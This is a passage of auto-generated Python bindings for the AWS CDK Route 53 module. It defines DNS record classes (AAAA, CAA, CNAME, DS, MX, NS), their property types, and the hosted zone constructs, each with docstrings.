:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = AaaaRecordProps(
target=target, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(AaaaRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.AaaaRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"target": "target",
},
)
class AaaaRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
target: RecordTarget,
) -> None:
'''Construction properties for a AaaaRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param target: The target.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"target": target,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def target(self) -> RecordTarget:
'''The target.'''
result = self._values.get("target")
assert result is not None, "Required property 'target' is missing"
return typing.cast(RecordTarget, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AaaaRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class AddressRecordTarget(
RecordTarget,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.AddressRecordTarget",
):
'''(deprecated) Target for a DNS A Record.
:deprecated: Use RecordTarget
:stability: deprecated
'''
def __init__(
self,
values: typing.Optional[typing.Sequence[builtins.str]] = None,
alias_target: typing.Optional[IAliasRecordTarget] = None,
) -> None:
'''
:param values: correspond with the chosen record type (e.g. for 'A' Type, specify one or more IP addresses).
:param alias_target: alias for targets such as CloudFront distribution to route traffic to.
'''
jsii.create(AddressRecordTarget, self, [values, alias_target])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CaaAmazonRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
},
)
class CaaAmazonRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Construction properties for a CaaAmazonRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CaaAmazonRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class CaaRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CaaRecord",
):
'''A DNS CAA record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[CaaRecordValue],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = CaaRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(CaaRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CaaRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class CaaRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[CaaRecordValue],
) -> None:
'''Construction properties for a CaaRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[CaaRecordValue]:
'''The values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[CaaRecordValue], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CaaRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class CnameRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CnameRecord",
):
'''A DNS CNAME record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
domain_name: builtins.str,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param domain_name: The domain name.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = CnameRecordProps(
domain_name=domain_name,
zone=zone,
comment=comment,
record_name=record_name,
ttl=ttl,
)
jsii.create(CnameRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CnameRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"domain_name": "domainName",
},
)
class CnameRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
domain_name: builtins.str,
) -> None:
'''Construction properties for a CnameRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param domain_name: The domain name.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"domain_name": domain_name,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def domain_name(self) -> builtins.str:
'''The domain name.'''
result = self._values.get("domain_name")
assert result is not None, "Required property 'domain_name' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CnameRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class DsRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.DsRecord",
):
'''A DNS DS record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[builtins.str],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The DS values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = DsRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(DsRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.DsRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class DsRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[builtins.str],
) -> None:
'''Construction properties for a DSRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The DS values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[builtins.str]:
'''The DS values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "DsRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(IHostedZone)
class HostedZone(
aws_cdk.core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.HostedZone",
):
'''Container for records, and records contain information about how to route traffic for a specific domain, such as example.com and its subdomains (acme.example.com, zenith.example.com).'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
vpcs: typing.Optional[typing.Sequence[aws_cdk.aws_ec2.IVpc]] = None,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
) -> None:
'''
:param scope: -
:param id: -
:param vpcs: A VPC that you want to associate with this hosted zone. When you specify this property, a private hosted zone will be created. You can associate additional VPCs to this private zone using ``addVpc(vpc)``. Default: public (no VPCs associated)
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
'''
props = HostedZoneProps(
vpcs=vpcs,
zone_name=zone_name,
comment=comment,
query_logs_log_group_arn=query_logs_log_group_arn,
)
jsii.create(HostedZone, self, [scope, id, props])
@jsii.member(jsii_name="fromHostedZoneAttributes") # type: ignore[misc]
@builtins.classmethod
def from_hosted_zone_attributes(
cls,
scope: constructs.Construct,
id: builtins.str,
*,
hosted_zone_id: builtins.str,
zone_name: builtins.str,
) -> IHostedZone:
'''Imports a hosted zone from another stack.
Use when both hosted zone ID and hosted zone name are known.
:param scope: the parent Construct for this Construct.
:param id: the logical name of this Construct.
:param hosted_zone_id: Identifier of the hosted zone.
:param zone_name: Name of the hosted zone.
'''
attrs = HostedZoneAttributes(
hosted_zone_id=hosted_zone_id, zone_name=zone_name
)
return typing.cast(IHostedZone, jsii.sinvoke(cls, "fromHostedZoneAttributes", [scope, id, attrs]))
@jsii.member(jsii_name="fromHostedZoneId") # type: ignore[misc]
@builtins.classmethod
def from_hosted_zone_id(
cls,
scope: constructs.Construct,
id: builtins.str,
hosted_zone_id: builtins.str,
) -> IHostedZone:
'''Import a Route 53 hosted zone defined either outside the CDK, or in a different CDK stack.
Use when hosted zone ID is known. Hosted zone name becomes unavailable through this query.
:param scope: the parent Construct for this Construct.
:param id: the logical name of this Construct.
:param hosted_zone_id: the ID of the hosted zone to import.
'''
return typing.cast(IHostedZone, jsii.sinvoke(cls, "fromHostedZoneId", [scope, id, hosted_zone_id]))
@jsii.member(jsii_name="fromLookup") # type: ignore[misc]
@builtins.classmethod
def from_lookup(
cls,
scope: constructs.Construct,
id: builtins.str,
*,
domain_name: builtins.str,
private_zone: typing.Optional[builtins.bool] = None,
vpc_id: typing.Optional[builtins.str] = None,
) -> IHostedZone:
'''Lookup a hosted zone in the current account/region based on query parameters.
Requires environment, you must specify env for the stack.
Use to easily query hosted zones.
:param scope: -
:param id: -
:param domain_name: The zone domain e.g. example.com.
:param private_zone: Whether the zone that is being looked up is a private hosted zone. Default: false
:param vpc_id: Specifies the ID of the VPC associated with a private hosted zone. If a VPC ID is provided and privateZone is false, no results will be returned and an error will be raised Default: - No VPC ID
:see: https://docs.aws.amazon.com/cdk/latest/guide/environments.html
'''
query = HostedZoneProviderProps(
domain_name=domain_name, private_zone=private_zone, vpc_id=vpc_id
)
return typing.cast(IHostedZone, jsii.sinvoke(cls, "fromLookup", [scope, id, query]))
@jsii.member(jsii_name="addVpc")
def add_vpc(self, vpc: aws_cdk.aws_ec2.IVpc) -> None:
'''Add another VPC to this private hosted zone.
:param vpc: the other VPC to add.
'''
return typing.cast(None, jsii.invoke(self, "addVpc", [vpc]))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneArn")
def hosted_zone_arn(self) -> builtins.str:
'''ARN of this hosted zone, such as arn:${Partition}:route53:::hostedzone/${Id}.'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneArn"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''ID of this hosted zone, such as "Z23ABC4XYZL05B".'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="vpcs")
def _vpcs(self) -> typing.List[CfnHostedZone.VPCProperty]:
'''VPCs to which this hosted zone will be added.'''
return typing.cast(typing.List[CfnHostedZone.VPCProperty], jsii.get(self, "vpcs"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zoneName")
def zone_name(self) -> builtins.str:
'''FQDN of this hosted zone.'''
return typing.cast(builtins.str, jsii.get(self, "zoneName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneNameServers")
def hosted_zone_name_servers(self) -> typing.Optional[typing.List[builtins.str]]:
'''Returns the set of name servers for the specific hosted zone. For example: ns1.example.com.
This attribute will be undefined for private hosted zones or hosted zones imported from another stack.
'''
return typing.cast(typing.Optional[typing.List[builtins.str]], jsii.get(self, "hostedZoneNameServers"))
class MxRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.MxRecord",
):
'''A DNS MX record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[MxRecordValue],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = MxRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(MxRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.MxRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class MxRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[MxRecordValue],
) -> None:
'''Construction properties for a MxRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[MxRecordValue]:
'''The values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[MxRecordValue], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "MxRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class NsRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.NsRecord",
):
'''A DNS NS record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[builtins.str],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The NS values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = NsRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(NsRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.NsRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class NsRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[builtins.str],
) -> None:
'''Construction properties for a NSRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The NS values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[builtins.str]:
'''The NS values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "NsRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(IPrivateHostedZone)
class PrivateHostedZone(
HostedZone,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.PrivateHostedZone",
):
'''Create a Route53 private hosted zone for use in one or more VPCs.
Note that ``enableDnsHostnames`` and ``enableDnsSupport`` must have been enabled
for the VPC you're configuring for private hosted zones.
:resource: AWS::Route53::HostedZone
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
vpc: aws_cdk.aws_ec2.IVpc,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
) -> None:
'''
:param scope: -
:param id: -
:param vpc: A VPC that you want to associate with this hosted zone. Private hosted zones must be associated with at least one VPC. You can associated additional VPCs using ``addVpc(vpc)``.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
'''
props = PrivateHostedZoneProps(
vpc=vpc,
zone_name=zone_name,
comment=comment,
query_logs_log_group_arn=query_logs_log_group_arn,
)
jsii.create(PrivateHostedZone, self, [scope, id, props])
@jsii.member(jsii_name="fromPrivateHostedZoneId") # type: ignore[misc]
@builtins.classmethod
def from_private_hosted_zone_id(
cls,
scope: constructs.Construct,
id: builtins.str,
private_hosted_zone_id: builtins.str,
) -> IPrivateHostedZone:
'''Import a Route 53 private hosted zone defined either outside the CDK, or in a different CDK stack.
:param scope: the parent Construct for this Construct.
:param id: the logical name of this Construct.
:param private_hosted_zone_id: the ID of the private hosted zone to import.
'''
return typing.cast(IPrivateHostedZone, jsii.sinvoke(cls, "fromPrivateHostedZoneId", [scope, id, private_hosted_zone_id]))
@jsii.implements(IPublicHostedZone)
class PublicHostedZone(
HostedZone,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.PublicHostedZone",
):
'''Create a Route53 public hosted zone.
:resource: AWS::Route53::HostedZone
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
caa_amazon: typing.Optional[builtins.bool] = None,
cross_account_zone_delegation_principal: typing.Optional[aws_cdk.aws_iam.IPrincipal] = None,
cross_account_zone_delegation_role_name: typing.Optional[builtins.str] = None,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
) -> None:
'''
:param scope: -
:param id: -
:param caa_amazon: Whether to create a CAA record to restrict certificate authorities allowed to issue certificates for this domain to Amazon only. Default: false
:param cross_account_zone_delegation_principal: A principal which is trusted to assume a role for zone delegation. Default: - No delegation configuration
:param cross_account_zone_delegation_role_name: The name of the role created for cross account delegation. Default: - A role name is generated automatically
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
'''
props = PublicHostedZoneProps(
caa_amazon=caa_amazon,
cross_account_zone_delegation_principal=cross_account_zone_delegation_principal,
cross_account_zone_delegation_role_name=cross_account_zone_delegation_role_name,
zone_name=zone_name,
comment=comment,
query_logs_log_group_arn=query_logs_log_group_arn,
)
jsii.create(PublicHostedZone, self, [scope, id, props])
@jsii.member(jsii_name="fromPublicHostedZoneId") # type: ignore[misc]
@builtins.classmethod
def from_public_hosted_zone_id(
cls,
scope: constructs.Construct,
id: builtins.str,
public_hosted_zone_id: builtins.str,
) -> IPublicHostedZone:
'''Import a Route 53 public hosted zone defined either outside the CDK, or in a different CDK stack.
:param scope: the parent Construct for this Construct.
:param id: the logical name of this Construct.
:param public_hosted_zone_id: the ID of the public hosted zone to import.
'''
return typing.cast(IPublicHostedZone, jsii.sinvoke(cls, "fromPublicHostedZoneId", [scope, id, public_hosted_zone_id]))
@jsii.member(jsii_name="addDelegation")
def add_delegation(
self,
delegate: IPublicHostedZone,
*,
comment: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Adds a delegation from this zone to a designated zone.
:param delegate: the zone being delegated to.
:param comment: A comment to add on the DNS record created to incorporate the delegation. Default: none
:param ttl: The TTL (Time To Live) of the DNS delegation record in DNS caches. Default: 172800
'''
opts = ZoneDelegationOptions(comment=comment, ttl=ttl)
